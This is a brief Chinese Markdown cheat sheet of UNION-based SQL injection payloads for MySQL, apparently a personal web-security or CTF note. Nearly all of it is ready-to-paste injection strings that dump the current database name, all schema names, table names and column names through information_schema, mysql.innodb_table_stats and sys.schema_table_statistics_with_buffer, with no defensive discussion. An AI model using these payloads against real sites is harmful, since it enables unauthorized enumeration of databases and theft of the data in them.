爆库、爆表、爆字段.md
基本原理都是利用group_concat以及mysql的元数据库或元表格
下面假设查询结果为三个字段,且注入点为2
使用imformation_schema
数据库
爆库
获取当前数据库
1' union select 1,database(),3;#
爆出所有数据库
1' union select 1,group_concat(schema_name),3 from information_schema.schemata;#
爆表
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='<database_name>';#
爆字段
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<table_name>';#
使用mysql.innodb_table_stats
表
爆库
1' union select 1,group_concat(database_name),3 from mysql.innodb_table_stats#
爆表
1' union select 1,group_concat(table_name),3 from mysql.innodb_table_stats#
使用sys.schema_table_statistics_with_buffer
表
前提条件
mysql > 5.7
root
用户
爆表
1' union select 1,group_concat(table_name),3 from sys.schema_table_statistics_with_buffer where table_schema=<database_name>#
#Web #SQL注入 #联合注入